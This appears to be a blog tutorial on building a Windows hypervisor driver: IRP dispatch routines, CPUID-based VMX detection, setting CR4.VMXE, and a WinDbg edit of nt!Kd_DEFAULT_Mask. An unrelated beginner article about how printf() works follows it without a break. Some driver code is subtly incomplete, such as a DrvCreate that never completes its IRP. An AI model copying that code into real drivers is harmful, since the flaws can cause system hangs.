Hypervisor From Scratch – Part 2: Entering VMX Operation

( Original text by Sinaei )

Hi guys,

This is the second part of a multi-part tutorial series called "Hypervisor From Scratch". I highly recommend reading the first part (Basic Concepts & Configure Testing Environment) before this one, as it contains the basic knowledge you need in order to understand the rest of the series.

In this part, we will learn how to detect hypervisor support on our processor, then configure the basics needed to enable VMX and enter VMX operation, and a lot more about the Windows Driver Kit (WDK).

Configuring Our IRP Major Functions

Besides our kernel-mode driver ("MyHypervisorDriver"), I created a user-mode application called "MyHypervisorApp" (the source code is available on my GitHub). First of all, I should encourage you to write most of your code in user-mode rather than kernel-mode: an unhandled exception in kernel-mode leads to a BSOD, and running less code in kernel-mode reduces the chance of introducing nasty kernel-mode bugs.

If you remember from the previous part, we wrote some Windows Driver Kit code; now we want to extend our project to support more IRP Major Functions.

IRP Major Functions live in a conventional Windows table that is created for every device. Once you register your device in Windows, you have to introduce the functions that handle these IRP Major Functions. In other words, every device has a table of its Major Functions, and every time a user-mode application calls one of them, Windows finds the corresponding function (if the device driver supports that MJ Function) based on the device requested by the user, calls it, and passes an IRP pointer to the kernel driver.

It is then the responsibility of the device's dispatch function to check the caller's privileges and so on.

The following code creates the device :

NTSTATUS NtStatus = STATUS_SUCCESS;
UINT64 uiIndex = 0;
PDEVICE_OBJECT pDeviceObject = NULL;
UNICODE_STRING usDriverName, usDosDeviceName;

DbgPrint("[*] DriverEntry Called.");

RtlInitUnicodeString(&usDriverName, L"\\Device\\MyHypervisorDevice");
RtlInitUnicodeString(&usDosDeviceName, L"\\DosDevices\\MyHypervisorDevice");

NtStatus = IoCreateDevice(pDriverObject, 0, &usDriverName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, FALSE, &pDeviceObject);
NTSTATUS NtStatusSymLinkResult = IoCreateSymbolicLink(&usDosDeviceName, &usDriverName);

Note that our device name is "\Device\MyHypervisorDevice".

After that, we need to introduce our Major Functions for our device.

if (NtStatus == STATUS_SUCCESS && NtStatusSymLinkResult == STATUS_SUCCESS)
{
	for (uiIndex = 0; uiIndex < IRP_MJ_MAXIMUM_FUNCTION; uiIndex++)
		pDriverObject->MajorFunction[uiIndex] = DrvUnsupported;

	DbgPrint("[*] Setting Devices major functions.");
	pDriverObject->MajorFunction[IRP_MJ_CLOSE] = DrvClose;
	pDriverObject->MajorFunction[IRP_MJ_CREATE] = DrvCreate;
	pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DrvIOCTLDispatcher;
	pDriverObject->MajorFunction[IRP_MJ_READ] = DrvRead;
	pDriverObject->MajorFunction[IRP_MJ_WRITE] = DrvWrite;

	pDriverObject->DriverUnload = DrvUnload;
}
else
{
	DbgPrint("[*] There were some errors in creating the device.");
}

You can see that I assigned "DrvUnsupported" to all functions; it handles any MJ Function we don't support and tells the user that it's not supported. The main body of this function looks like this:

NTSTATUS DrvUnsupported(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
	DbgPrint("[*] This function is not supported 🙁 !");

	Irp->IoStatus.Status = STATUS_SUCCESS;
	Irp->IoStatus.Information = 0;
	IoCompleteRequest(Irp, IO_NO_INCREMENT);

	return STATUS_SUCCESS;
}

We also introduce the other major functions that are essential for our device. We'll complete their implementations in future parts; for now, let's leave them as stubs.

NTSTATUS DrvCreate(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
	DbgPrint("[*] Not implemented yet 🙁 !");

	Irp->IoStatus.Status = STATUS_SUCCESS;
	Irp->IoStatus.Information = 0;
	IoCompleteRequest(Irp, IO_NO_INCREMENT);

	return STATUS_SUCCESS;
}

NTSTATUS DrvRead(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
	DbgPrint("[*] Not implemented yet 🙁 !");

	Irp->IoStatus.Status = STATUS_SUCCESS;
	Irp->IoStatus.Information = 0;
	IoCompleteRequest(Irp, IO_NO_INCREMENT);

	return STATUS_SUCCESS;
}

NTSTATUS DrvWrite(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
	DbgPrint("[*] Not implemented yet 🙁 !");

	Irp->IoStatus.Status = STATUS_SUCCESS;
	Irp->IoStatus.Information = 0;
	IoCompleteRequest(Irp, IO_NO_INCREMENT);

	return STATUS_SUCCESS;
}

NTSTATUS DrvClose(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
	DbgPrint("[*] Not implemented yet 🙁 !");

	Irp->IoStatus.Status = STATUS_SUCCESS;
	Irp->IoStatus.Information = 0;
	IoCompleteRequest(Irp, IO_NO_INCREMENT);

	return STATUS_SUCCESS;
}

Now let's look at the list of IRP MJ Functions and at other kinds of Windows Driver Kit handler routines.

IRP Major Functions List

This is a list of IRP Major Functions which we can use in order to perform different operations.

#define IRP_MJ_CREATE                   0x00
#define IRP_MJ_CREATE_NAMED_PIPE        0x01
#define IRP_MJ_CLOSE                    0x02
#define IRP_MJ_READ                     0x03
#define IRP_MJ_WRITE                    0x04
#define IRP_MJ_QUERY_INFORMATION        0x05
#define IRP_MJ_SET_INFORMATION          0x06
#define IRP_MJ_QUERY_EA                 0x07
#define IRP_MJ_SET_EA                   0x08
#define IRP_MJ_FLUSH_BUFFERS            0x09
#define IRP_MJ_QUERY_VOLUME_INFORMATION 0x0a
#define IRP_MJ_SET_VOLUME_INFORMATION   0x0b
#define IRP_MJ_DIRECTORY_CONTROL        0x0c
#define IRP_MJ_FILE_SYSTEM_CONTROL      0x0d
#define IRP_MJ_DEVICE_CONTROL           0x0e
#define IRP_MJ_INTERNAL_DEVICE_CONTROL  0x0f
#define IRP_MJ_SHUTDOWN                 0x10
#define IRP_MJ_LOCK_CONTROL             0x11
#define IRP_MJ_CLEANUP                  0x12
#define IRP_MJ_CREATE_MAILSLOT          0x13
#define IRP_MJ_QUERY_SECURITY           0x14
#define IRP_MJ_SET_SECURITY             0x15
#define IRP_MJ_POWER                    0x16
#define IRP_MJ_SYSTEM_CONTROL           0x17
#define IRP_MJ_DEVICE_CHANGE            0x18
#define IRP_MJ_QUERY_QUOTA              0x19
#define IRP_MJ_SET_QUOTA                0x1a
#define IRP_MJ_PNP                      0x1b
#define IRP_MJ_PNP_POWER                IRP_MJ_PNP      // Obsolete....
#define IRP_MJ_MAXIMUM_FUNCTION         0x1b

Every major function triggers only when we call its corresponding function from user-mode. For instance, there is a user-mode function called CreateFile (and all its variants, like CreateFileA and CreateFileW for ANSI and Unicode), so every time we call CreateFile, the function registered for IRP_MJ_CREATE is called; likewise, ReadFile triggers IRP_MJ_READ and WriteFile triggers IRP_MJ_WRITE. You can see that Windows treats its devices like files, and everything we need to pass from user-mode to kernel-mode is available in the PIRP Irp as a buffer when the function is called.

In this case, Windows is responsible for copying the user-mode buffer into kernel-mode memory.

Don't worry, we'll use these frequently in the rest of the project, but in this part we only support IRP_MJ_CREATE and leave the others unimplemented for future parts. A small user-mode sketch of this mapping follows.
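To make the mapping concrete, here is a minimal user-mode sketch (an illustrative, hypothetical snippet; the device path matches the one we create in this part). Each Win32 call on the device handle lands in the corresponding IRP_MJ_* dispatch routine of our driver:

#include <Windows.h>

int main()
{
	// CreateFile on our device -> the driver's IRP_MJ_CREATE routine
	HANDLE hDevice = CreateFile(L"\\\\.\\MyHypervisorDevice",
		GENERIC_READ | GENERIC_WRITE,
		FILE_SHARE_READ | FILE_SHARE_WRITE,
		NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

	if (hDevice == INVALID_HANDLE_VALUE)
		return 1;

	char  Buffer[64] = { 0 };
	DWORD Bytes = 0;

	ReadFile(hDevice, Buffer, sizeof(Buffer), &Bytes, NULL);  // -> IRP_MJ_READ
	WriteFile(hDevice, Buffer, sizeof(Buffer), &Bytes, NULL); // -> IRP_MJ_WRITE
	CloseHandle(hDevice);                                     // -> IRP_MJ_CLEANUP, then IRP_MJ_CLOSE

	return 0;
}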

IRP Minor Functions

IRP Minor Functions are mainly used by the PnP manager to notify a driver of special events. For example, the PnP manager sends IRP_MN_START_DEVICE after it has assigned hardware resources (if any) to the device, and it sends IRP_MN_STOP_DEVICE to stop a device so it can reconfigure the device's hardware resources.

We will need these minor functions later in this series; a minimal dispatch sketch follows the list below.

A list of IRP Minor Functions is available below:

IRP_MN_START_DEVICE
IRP_MN_QUERY_STOP_DEVICE
IRP_MN_STOP_DEVICE
IRP_MN_CANCEL_STOP_DEVICE
IRP_MN_QUERY_REMOVE_DEVICE
IRP_MN_REMOVE_DEVICE
IRP_MN_CANCEL_REMOVE_DEVICE
IRP_MN_SURPRISE_REMOVAL
IRP_MN_QUERY_CAPABILITIES
IRP_MN_QUERY_PNP_DEVICE_STATE
IRP_MN_FILTER_RESOURCE_REQUIREMENTS
IRP_MN_DEVICE_USAGE_NOTIFICATION
IRP_MN_QUERY_DEVICE_RELATIONS
IRP_MN_QUERY_RESOURCES
IRP_MN_QUERY_RESOURCE_REQUIREMENTS
IRP_MN_QUERY_ID
IRP_MN_QUERY_DEVICE_TEXT
IRP_MN_QUERY_BUS_INFORMATION
IRP_MN_QUERY_INTERFACE
IRP_MN_READ_CONFIG
IRP_MN_WRITE_CONFIG
IRP_MN_DEVICE_ENUMERATED
IRP_MN_SET_LOCK
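As a rough illustration (a hypothetical handler, not part of our driver yet): a PnP driver registers a routine for IRP_MJ_PNP and switches on the minor code found in the current IRP stack location, something like this:

NTSTATUS DrvPnp(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
	PIO_STACK_LOCATION IrpSp = IoGetCurrentIrpStackLocation(Irp);

	switch (IrpSp->MinorFunction)
	{
	case IRP_MN_START_DEVICE:
		// Hardware resources have been assigned; initialize the device here.
		break;
	case IRP_MN_STOP_DEVICE:
		// Quiesce the device so its resources can be reconfigured.
		break;
	default:
		break;
	}

	Irp->IoStatus.Status = STATUS_SUCCESS;
	Irp->IoStatus.Information = 0;
	IoCompleteRequest(Irp, IO_NO_INCREMENT);
	return STATUS_SUCCESS;
}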

Fast I/O

To optimize your VMM, you can use Fast I/O, which is a different way to initiate I/O operations and is faster than the IRP path. Fast I/O operations are always synchronous.

According to MSDN:

Fast I/O is specifically designed for rapid synchronous I/O on cached files. In fast I/O operations, data is transferred directly between user buffers and the system cache, bypassing the file system and the storage driver stack. (Storage drivers do not use fast I/O.) If all of the data to be read from a file is resident in the system cache when a fast I/O read or write request is received, the request is satisfied immediately. 

When the I/O Manager receives a request for synchronous file I/O (other than paging I/O), it invokes the fast I/O routine first. If the fast I/O routine returns TRUE, the operation was serviced by the fast I/O routine. If the fast I/O routine returns FALSE, the I/O Manager creates and sends an IRP instead.

The definition of the Fast I/O dispatch table is:

typedef struct _FAST_IO_DISPATCH {
  ULONG                                  SizeOfFastIoDispatch;
  PFAST_IO_CHECK_IF_POSSIBLE             FastIoCheckIfPossible;
  PFAST_IO_READ                          FastIoRead;
  PFAST_IO_WRITE                         FastIoWrite;
  PFAST_IO_QUERY_BASIC_INFO              FastIoQueryBasicInfo;
  PFAST_IO_QUERY_STANDARD_INFO           FastIoQueryStandardInfo;
  PFAST_IO_LOCK                          FastIoLock;
  PFAST_IO_UNLOCK_SINGLE                 FastIoUnlockSingle;
  PFAST_IO_UNLOCK_ALL                    FastIoUnlockAll;
  PFAST_IO_UNLOCK_ALL_BY_KEY             FastIoUnlockAllByKey;
  PFAST_IO_DEVICE_CONTROL                FastIoDeviceControl;
  PFAST_IO_ACQUIRE_FILE                  AcquireFileForNtCreateSection;
  PFAST_IO_RELEASE_FILE                  ReleaseFileForNtCreateSection;
  PFAST_IO_DETACH_DEVICE                 FastIoDetachDevice;
  PFAST_IO_QUERY_NETWORK_OPEN_INFO       FastIoQueryNetworkOpenInfo;
  PFAST_IO_ACQUIRE_FOR_MOD_WRITE         AcquireForModWrite;
  PFAST_IO_MDL_READ                      MdlRead;
  PFAST_IO_MDL_READ_COMPLETE             MdlReadComplete;
  PFAST_IO_PREPARE_MDL_WRITE             PrepareMdlWrite;
  PFAST_IO_MDL_WRITE_COMPLETE            MdlWriteComplete;
  PFAST_IO_READ_COMPRESSED               FastIoReadCompressed;
  PFAST_IO_WRITE_COMPRESSED              FastIoWriteCompressed;
  PFAST_IO_MDL_READ_COMPLETE_COMPRESSED  MdlReadCompleteCompressed;
  PFAST_IO_MDL_WRITE_COMPLETE_COMPRESSED MdlWriteCompleteCompressed;
  PFAST_IO_QUERY_OPEN                    FastIoQueryOpen;
  PFAST_IO_RELEASE_FOR_MOD_WRITE         ReleaseForModWrite;
  PFAST_IO_ACQUIRE_FOR_CCFLUSH           AcquireForCcFlush;
  PFAST_IO_RELEASE_FOR_CCFLUSH           ReleaseForCcFlush;
} FAST_IO_DISPATCH, *PFAST_IO_DISPATCH;
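As a hedged sketch (hypothetical names, not something our driver uses yet): wiring a Fast I/O routine means filling this table and pointing the driver object at it in DriverEntry. The I/O Manager tries the fast routine first; returning TRUE means the request was serviced without creating an IRP, and FALSE falls back to the normal IRP_MJ_DEVICE_CONTROL path.

// Matches the PFAST_IO_DEVICE_CONTROL prototype from wdm.h.
BOOLEAN FastIoDeviceControlHandler(
	PFILE_OBJECT FileObject, BOOLEAN Wait,
	PVOID InputBuffer, ULONG InputBufferLength,
	PVOID OutputBuffer, ULONG OutputBufferLength,
	ULONG IoControlCode, PIO_STATUS_BLOCK IoStatus,
	PDEVICE_OBJECT DeviceObject)
{
	// Service the IOCTL directly; no IRP is ever built.
	IoStatus->Status      = STATUS_SUCCESS;
	IoStatus->Information = 0;
	return TRUE;
}

FAST_IO_DISPATCH g_FastIoDispatch = { 0 };

// Inside DriverEntry:
//   g_FastIoDispatch.SizeOfFastIoDispatch = sizeof(FAST_IO_DISPATCH);
//   g_FastIoDispatch.FastIoDeviceControl  = FastIoDeviceControlHandler;
//   pDriverObject->FastIoDispatch         = &g_FastIoDispatch;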

Defined Headers

I created the following header (Source.h) for my driver.

#pragma once
#include <ntddk.h>
#include <wdf.h>
#include <wdm.h>

extern void inline Breakpoint(void);
extern void inline Enable_VMX_Operation(void);

NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath);
VOID DrvUnload(PDRIVER_OBJECT DriverObject);
NTSTATUS DrvCreate(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);
NTSTATUS DrvRead(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);
NTSTATUS DrvWrite(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);
NTSTATUS DrvClose(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);
NTSTATUS DrvUnsupported(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);
NTSTATUS DrvIOCTLDispatcher(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);

VOID PrintChars(_In_reads_(CountChars) PCHAR BufferAddress, _In_ size_t CountChars);
VOID PrintIrpInfo(PIRP Irp);

#pragma alloc_text(INIT, DriverEntry)
#pragma alloc_text(PAGE, DrvUnload)
#pragma alloc_text(PAGE, DrvCreate)
#pragma alloc_text(PAGE, DrvRead)
#pragma alloc_text(PAGE, DrvWrite)
#pragma alloc_text(PAGE, DrvClose)
#pragma alloc_text(PAGE, DrvUnsupported)
#pragma alloc_text(PAGE, DrvIOCTLDispatcher)

// IOCTL codes and their meanings
#define IOCTL_TEST 0x1 // In case of testing

Now just compile your driver.

Loading the Driver and Checking the Presence of the Device

In order to load our driver (MyHypervisorDriver), first download OSR Driver Loader, then run Sysinternals DbgView as administrator and make sure that DbgView captures kernel output (you can check via Capture -> Capture Kernel).

Enable Capturing Event

After that, open OSR Driver Loader (go to OsrLoader -> kit -> WNET -> AMD64 -> FRE) and run OSRLOADER.exe (in an x64 environment). Now, if you've built your driver, find the .sys file (in MyHypervisorDriver\x64\Debug\ there should be a file named "MyHypervisorDriver.sys"). In OSR Driver Loader, click Browse, select MyHypervisorDriver.sys, and then click "Register Service". After the message box confirms that your driver registered successfully, click "Start Service".

Please note that you need the WDK installed for your Visual Studio in order to be able to build the project.

Load Driver in OSR Driver Loader

Now go back to DbgView; you should see that your driver loaded successfully, and a message "[*] DriverEntry Called." should appear.

If there is no problem then you’re good to go, otherwise, if you have a problem with DbgView you can check the next step.

Keep in mind that now that you've registered your driver, you can use Sysinternals WinObj to see whether "MyHypervisorDevice" is present or not.

WinObj

The Problem with DbgView

Unfortunately, for some unknown reason, I'm not able to view the result of DbgPrint(). If you can see the results, you can skip this step, but if you have the same problem, perform the following steps:

As I mentioned in part 1:

In regedit, add a key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Debug Print Filter

Under that key, add a DWORD value named IHVDRIVER with a value of 0xFFFF.

Reboot the machine and you'll be good to go.

This always works for me, and I've tested it on many computers, but my MacBook seems to have a problem.

In order to solve this problem, you need to find a Windows kernel global variable called nt!Kd_DEFAULT_Mask. This variable controls which messages show up in DbgView; it's a bitmask whose exact layout I'm not aware of, so I just put 0xFFFFFFFF in it to simply make it show everything!

To do this, you need to set up local kernel debugging of Windows using Windbg.

  1. Open a Command Prompt window as Administrator. Enter bcdedit /debug on
  2. If the computer is not already configured as the target of a debug transport, enter bcdedit /dbgsettings local
  3. Reboot the computer.

After that, open Windbg with Administrator privileges (UAC), go to File > Kernel Debug > Local > press OK, and in your local Windbg session find nt!Kd_DEFAULT_Mask using the following command:

lkd> x nt!Kd_DEFAULT_Mask
fffff801`f5211808 nt!Kd_DEFAULT_Mask = <no type information>

Now change its value to 0xFFFFFFFF.

lkd> eb fffff801`f5211808 ff ff ff ff
kd_DEFAULT_Mask

After that, you should see the results, and now you'll be good to go.

Remember, this is an essential step for the rest of this series: if we can't see any kernel messages, then we can't debug.

DbgView

Detecting Hypervisor Support

Discovering support for VMX is the first thing you should do before enabling VT-x; this is covered in the Intel Software Developer's Manual, Volume 3C, Section 23.6 (DISCOVERING SUPPORT FOR VMX).

You can detect the presence of VMX using CPUID: if CPUID.1:ECX.VMX[bit 5] = 1, then VMX operation is supported.

First of all, we need to know whether we're running on an Intel-based processor or not. This can be determined by executing the CPUID instruction and checking for the vendor string "GenuineIntel".

The following function returns the vendor string from the CPUID instruction.

string GetCpuID()
{
	//Initialize used variables
	char SysType[13]; //Array consisting of 13 single bytes/characters
	string CpuID; //The string that will be used to add all the characters to

	//Starting coding in assembly language
	_asm
	{
		//Execute CPUID with EAX = 0 to get the CPU producer
		XOR EAX, EAX
		CPUID
		//MOV EBX to EAX and get the characters one by one by using shift right bitwise operations.
		MOV EAX, EBX
		MOV SysType[0], al
		MOV SysType[1], ah
		SHR EAX, 16
		MOV SysType[2], al
		MOV SysType[3], ah
		//Get the second part the same way but these values are stored in EDX
		MOV EAX, EDX
		MOV SysType[4], al
		MOV SysType[5], ah
		SHR EAX, 16
		MOV SysType[6], al
		MOV SysType[7], ah
		//Get the third part
		MOV EAX, ECX
		MOV SysType[8], al
		MOV SysType[9], ah
		SHR EAX, 16
		MOV SysType[10], al
		MOV SysType[11], ah
		MOV SysType[12], 00
	}
	CpuID.assign(SysType, 12);
	return CpuID;
}

The last step is checking for the presence of VMX; you can check it using the following code:

bool VMX_Support_Detection()
{
	bool VMX = false;
	__asm
	{
		xor    eax, eax
		inc    eax
		cpuid
		bt     ecx, 0x5
		jc     VMXSupport
		VMXNotSupport:
		jmp    NopInstr
		VMXSupport:
		mov    VMX, 0x1
		NopInstr:
		nop
	}
	return VMX;
}

As you can see, it executes CPUID with EAX=1, and if bit 5 (the 6th bit) of ECX is 1, then VMX operation is supported. We can also do the same thing in a kernel driver, as sketched below.
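For example, a minimal kernel-mode sketch (x64 C files can't use inline assembly, so we'd rely on the MSVC __cpuid intrinsic instead; the function name is my own):

#include <intrin.h>

BOOLEAN IsVmxSupported(void)
{
	int cpuInfo[4] = { 0 };           // EAX, EBX, ECX, EDX

	__cpuid(cpuInfo, 1);              // CPUID leaf 1: feature information
	return (cpuInfo[2] & (1 << 5)) != 0;  // ECX bit 5 = VMX
}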

All in all, our main code should be something like this:

int main()
{
	string CpuID;
	CpuID = GetCpuID();
	cout << "[*] The CPU Vendor is : " << CpuID << endl;
	if (CpuID == "GenuineIntel")
	{
		cout << "[*] The Processor virtualization technology is VT-x. \n";
	}
	else
	{
		cout << "[*] This program is not designed to run in a non-VT-x environment !\n";
		return 1;
	}
	if (VMX_Support_Detection())
	{
		cout << "[*] VMX Operation is supported by your processor.\n";
	}
	else
	{
		cout << "[*] VMX Operation is not supported by your processor.\n";
		return 1;
	}
	_getch();
	return 0;
}

The final result:

User-mode app

Enabling VMX Operation

If our processor supports VMX operation, then it's time to enable it. As I said above, IRP_MJ_CREATE is the first function that should be used to start the operation.

From the Intel Software Developer's Manual (23.7 ENABLING AND ENTERING VMX OPERATION):

Before system software can enter VMX operation, it enables VMX by setting CR4.VMXE[bit 13] = 1. VMX operation is then entered by executing the VMXON instruction. VMXON causes an invalid-opcode exception (#UD) if executed with CR4.VMXE = 0. Once in VMX operation, it is not possible to clear CR4.VMXE. System software leaves VMX operation by executing the VMXOFF instruction. CR4.VMXE can be cleared outside of VMX operation after executing of VMXOFF.
VMXON is also controlled by the IA32_FEATURE_CONTROL MSR (MSR address 3AH). This MSR is cleared to zero when a logical processor is reset. The relevant bits of the MSR are:

  •  Bit 0 is the lock bit. If this bit is clear, VMXON causes a general-protection exception. If the lock bit is set, WRMSR to this MSR causes a general-protection exception; the MSR cannot be modified until a power-up reset condition. System BIOS can use this bit to provide a setup option for BIOS to disable support for VMX. To enable VMX support in a platform, BIOS must set bit 1, bit 2, or both, as well as the lock bit.
  •  Bit 1 enables VMXON in SMX operation. If this bit is clear, execution of VMXON in SMX operation causes a general-protection exception. Attempts to set this bit on logical processors that do not support both VMX operation and SMX operation cause general-protection exceptions.
  •  Bit 2 enables VMXON outside SMX operation. If this bit is clear, execution of VMXON outside SMX operation causes a general-protection exception. Attempts to set this bit on logical processors that do not support VMX operation cause general-protection exceptions.
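Putting the quoted rules into code, here is a minimal sketch (assuming the MSVC __readmsr/__writemsr intrinsics and MSR index 0x3A; the function name is hypothetical) that checks the lock bit and, if the MSR is still unlocked, sets bit 2 plus the lock bit so VMXON can succeed outside SMX. In a real driver, this check would run on each logical processor.

#define IA32_FEATURE_CONTROL_MSR 0x3A

BOOLEAN CheckAndEnableFeatureControl(void)
{
	ULONG64 Msr = __readmsr(IA32_FEATURE_CONTROL_MSR);

	if ((Msr & 0x1) == 0)
	{
		// Lock bit clear (e.g., BIOS left the MSR unlocked):
		// set bit 2 (VMXON outside SMX) and bit 0 (lock) ourselves.
		__writemsr(IA32_FEATURE_CONTROL_MSR, Msr | 0x5);
		return TRUE;
	}

	// Locked: VMXON only works if the BIOS already set bit 2.
	return (Msr & 0x4) != 0;
}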

Setting CR4 VMXE Bit

Do you remember the previous part, where I showed you how to create inline assembly in a Windows Driver Kit x64 project?

Now we'll create a function to perform this operation in assembly.

First, declare your function in the header file (in my case Source.h):

extern void inline Enable_VMX_Operation(void);

Then in the assembly file (in my case SourceAsm.asm) add this function (which sets bit 13 of CR4).

Enable_VMX_Operation PROC PUBLIC
	push rax          ; Save the state
	xor rax, rax      ; Clear RAX
	mov rax, cr4
	or rax, 02000h    ; Set bit 13 (CR4.VMXE)
	mov cr4, rax
	pop rax           ; Restore the state
	ret
Enable_VMX_Operation ENDP

Also, declare your function at the top of SourceAsm.asm.

PUBLIC Enable_VMX_Operation

The above function should be called in DrvCreate:

NTSTATUS DrvCreate(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
	Enable_VMX_Operation(); // Enabling VMX Operation
	DbgPrint("[*] VMX Operation Enabled Successfully !");
	return STATUS_SUCCESS;
}

Finally, you should call the following function from user-mode:

HANDLE hWnd = CreateFile(L"\\\\.\\MyHypervisorDevice",
	GENERIC_READ | GENERIC_WRITE,
	FILE_SHARE_READ | FILE_SHARE_WRITE,
	NULL, /// lpSecurityAttributes
	OPEN_EXISTING,
	FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED,
	NULL); /// lpTemplateFile

If you see the following result, then you completed the second part successfully.

Final Show

Important Note: Your .asm file should have a different name from your driver's main .c file. For example, if your driver file is "Source.c", then using the name "Source.asm" causes weird linking errors in Visual Studio; rename your .asm file to something like "SourceAsm.asm" to avoid these kinds of linker errors.

Conclusion

In this part, you learned the basics you need to know in order to create a Windows Driver Kit program, and then we entered VMX operation, building a cornerstone for the rest of the series.

In the third part, we'll go deeper into Intel VT-x and make our driver even more advanced, so stay tuned, it'll be ready soon!

The source code of this topic is available at :

[https://github.com/SinaKarvandi/Hypervisor-From-Scratch/]

References

[1] Intel® 64 and IA-32 Architectures Software Developer's Manual, Combined Volumes 3 (https://software.intel.com/en-us/articles/intel-sdm)

[2] IRP_MJ_DEVICE_CONTROL (https://docs.microsoft.com/en-us/windows-hardware/drivers/kernel/irp-mj-device-control)

[3]  Windows Driver Kit Samples (https://github.com/Microsoft/Windows-driver-samples/blob/master/general/ioctl/wdm/sys/sioctl.c)

[4] Setting Up Local Kernel Debugging of a Single Computer Manually (https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/setting-up-local-kernel-debugging-of-a-single-computer-manually)

[5] Obtain processor manufacturer using CPUID (https://www.daniweb.com/programming/software-development/threads/112968/obtain-processor-manufacturer-using-cpuid)

[6] Plug and Play Minor IRPs (https://docs.microsoft.com/en-us/windows-hardware/drivers/kernel/plug-and-play-minor-irps)

[7] _FAST_IO_DISPATCH structure (https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/wdm/ns-wdm-_fast_io_dispatch)

[8] Filtering IRPs and Fast I/O (https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/filtering-irps-and-fast-i-o)

[9] Windows File System Filter Driver Development (https://www.apriorit.com/dev-blog/167-file-system-filter-driver)


Tearing apart printf()


If ‘Hello World’ is the first program for C students, then printf() is probably the first function. I’ve had to answer questions about printf() many times over the years, so I’ve finally set aside time for an informal writeup. The common questions fit roughly in to two forms:

  • Easy: How does printf mechanically solve the format problem?
  • Complex: How does printf actually display text on my console?

My usual answer?
"Just open up stdio.h and track it down"

This wild goose chase is not only a great learning experience, but also an interesting test for the dedicated beginner. Will they come back with an answer? If so, how detailed is it? What IS a good answer?


printf() in 30 seconds — TL;DR edition

printf’s execution is tailored to your system and generally goes like this:

  1. Your application uses printf()
  2. Your compiler/linker produce a binary. printf is a load-time pointer to your C library
  3. Your C runtime fixes up the format and sends the string to the kernel via a generic write
  4. Your OS mediates the string’s access to its console representation via a device driver
  5. Text appears in your screen

…but you probably already knew all that.

This is the common case for user-space applications running on an off-the-shelf system. (Side-stepping virtual/embedded/distributed/real-mode machines for the moment).

A more complicated answer starts with: It depends — printf mechanics vary across a long list of things: your compiler toolchain, your system architecture (including the operating system), and obviously how you've used it in your program. The diagram above is generally correct but precisely useless for any specific situation.

If you’re not impressed, that’s good. Let’s refine it.


printf() in 90 seconds — Interview question edition

  1. You include the <stdio.h> header in your application
  2. You use printf non-trivially in your app.
  3. Your compiler produces object code — printf is recognized, but unresolved
  4. The linker constructs the executable, printf is tagged for run-time resolution
  5. You execute your program. Standard library is mapped in the process address space
  6. A call to printf() jumps to library code
  7. The formatted string is resolved in a temporary buffer
  8. Standard library writes to the stdout buffered stream. Eventual kernel write entry
  9. Kernel calls a driver write operation for the associated console
  10. Console output buffer is updated with the new string
  11. Output text appears on your console

Sounds better? There’s still a lot missing, including any mention of system specifics. More things to think about (in no particular order):

  • Are we using static or dynamic linkage? Normally printf is run-time linked, but there are exceptions.
  • What OS is this? The differences between them are drastic — When/how is stdout managed? What is the console and how is it updated? What is the kernel entry/syscall procedure…
  • Closely related to the OS…what kind of executable is this? If ELF, we need to talk about the GOT / PLT. If PE (Windows), then we need an import directory.
  • What kind of terminal are you using? Standard laptop/desktop? University cluster over ssh? Is this a virtual machine?
  • This list could go on forever, and all answers affect what really happens behind the scenes.

Things to know before continuing

The next part is targeted for C beginners who want to explore how functions execute through a complex system. I’m keeping the discussion at a high-level so we can focus on how many parts of the problem contribute to a whole solution. I’ll provide references to source code and technical documents so readers can explore on their own. No blog substitutes for authoritative documentation.

Now for a more important question:
Why do beginners get stuck searching for a detailed answer about basic functions like printf()?

I’ll boil it down to three problems:

Not understanding the distinct roles of the compiler, standard library, operating system, and hardware. You can’t look at just one aspect of a system and expect to understand how a function like printf() works. Each component handles a part of the ‘printf’ problem and passes the work to the next using common interfaces along the way. C compilers try to adhere to the ISO C standards. Operating systems may also follow standards such as POSIX/SUS. Standardization streamlines interoperability and portability, but with the cost of code complexity. Beginners often struggle following the chain of code, especially when the standard requirements end and the ‘actual work’ begins between the interfaces. The common complaint: Too many seemingly useless function calls between the interface and the work. This is the price of interoperability and there’s no easy + maintainable + scalable way around it!

Not grasping [compile/link/load/run]-time dynamics. Manual static analysis has limits, and so following any function through the standard library source code inevitably leads to a dead end — an unresolved jump table, an opaque macro with multiple expansions, or a hard stop at the end: an ambiguous function pointer. In printf's case, that would be *write, which the operating system promises will exist at run-time. Modern compilers and OSs are designed to be multi-platform, and thus every possible code path that could exist is visible prior to compilation. Beginners may get lost in a code base where much of the source 'compiles away' and functions resolve dynamically at execution. Trivial case: If you call printf() on a basic string without formats, your compiler may emit a call to 'puts', discarding your printf entirely!

Not enough exposure to common abstractions used in complex software systems. Tracing any function through the compiler and OS means working through many disparate ideas in computing. For instance, many I/O operations involve the idea of a character stream. Buffering character I/O with streams has been part of Unix System V since the early 1980s, thanks in part to Dennis Ritchie, co-author of ‘The C Programming Language’. Since the 1990s, multiprocessing has become the norm. Tracing printf means stepping around locks, mutexes, semaphores, and other synchronization tools. More recently, i18n has upped the ante for simple console output. All these concepts taken together often distract and overwhelm beginners who are simply trying to understand one core problem.

